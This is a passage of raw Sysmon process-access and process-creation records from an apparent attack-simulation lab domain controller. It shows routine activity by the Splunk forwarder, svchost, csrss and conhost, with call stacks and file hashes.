Files\SplunkUniversalForwarder\bin\splunkd.exe+7c9f0d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+6d7908|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+6de2ee|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+6b29fa|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+6b4274|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+e42dc|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ec682|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+e9959|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+d7f31|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x80000000000000002216Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:20.441{59A5CD1D-8E5C-6005-6300-00000000A301}3512C:\Windows\System32\cmd.exe10.0.14393.0 (rs1_release.160715-1616)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.ExeC:\Windows\system32\cmd.exe /c ""C:\Program Files\SplunkUniversalForwarder\etc\system\bin\WinRegMon.cmd" --scheme"C:\Windows\system32\NT AUTHORITY\SYSTEM{59A5CD1D-8E44-6005-E703-000000000000}0x3e70SystemMD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A{59A5CD1D-8E56-6005-3000-00000000A301}2532C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x80000000000000002215Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:20.330{59A5CD1D-8E58-6005-3A00-00000000A301}36643684C:\Windows\system32\conhost.exe{59A5CD1D-8E5C-6005-6200-00000000A301}3652C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002214Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:20.330{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002213Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:20.330{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002212Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:20.330{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002211Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:20.330{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002210Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:20.330{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002209Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:20.330{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002208Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:20.330{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002207Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:20.330{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002206Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:20.330{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002205Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:20.330{59A5CD1D-8E44-6005-0500-00000000A301}640756C:\Windows\system32\csrss.exe{59A5CD1D-8E5C-6005-6200-00000000A301}3652C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000002204Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:20.330{59A5CD1D-8E56-6005-3000-00000000A301}25323660C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{59A5CD1D-8E5C-6005-6200-00000000A301}3652C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+7d35e7|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+7cdcb9|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+7ca4ec|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+7ca0a3|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+7c9f0d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+6d7908|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+6de2ee|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+6b29fa|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+6b4274|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+e42dc|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ec682|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+e9959|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+d7f31|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x80000000000000002203Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:20.332{59A5CD1D-8E5C-6005-6200-00000000A301}3652C:\Windows\System32\cmd.exe10.0.14393.0 (rs1_release.160715-1616)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.ExeC:\Windows\system32\cmd.exe /c ""C:\Program Files\SplunkUniversalForwarder\etc\system\bin\WinPrintMon.cmd" --scheme"C:\Windows\system32\NT AUTHORITY\SYSTEM{59A5CD1D-8E44-6005-E703-000000000000}0x3e70SystemMD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A{59A5CD1D-8E56-6005-3000-00000000A301}2532C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x80000000000000002202Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:20.220{59A5CD1D-8E58-6005-3A00-00000000A301}36643684C:\Windows\system32\conhost.exe{59A5CD1D-8E5C-6005-6100-00000000A301}3464C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002201Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:20.220{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002200Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:20.220{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002199Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:20.220{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002198Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:20.220{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002197Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:20.220{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002196Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:20.220{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002195Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:20.220{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002194Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:20.220{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002193Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:20.220{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002192Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:20.220{59A5CD1D-8E44-6005-0500-00000000A301}640656C:\Windows\system32\csrss.exe{59A5CD1D-8E5C-6005-6100-00000000A301}3464C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000002191Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:20.220{59A5CD1D-8E56-6005-3000-00000000A301}25323660C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{59A5CD1D-8E5C-6005-6100-00000000A301}3464C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+7d35e7|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+7cdcb9|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+7ca4ec|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+7ca0a3|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+7c9f0d|C:\Program 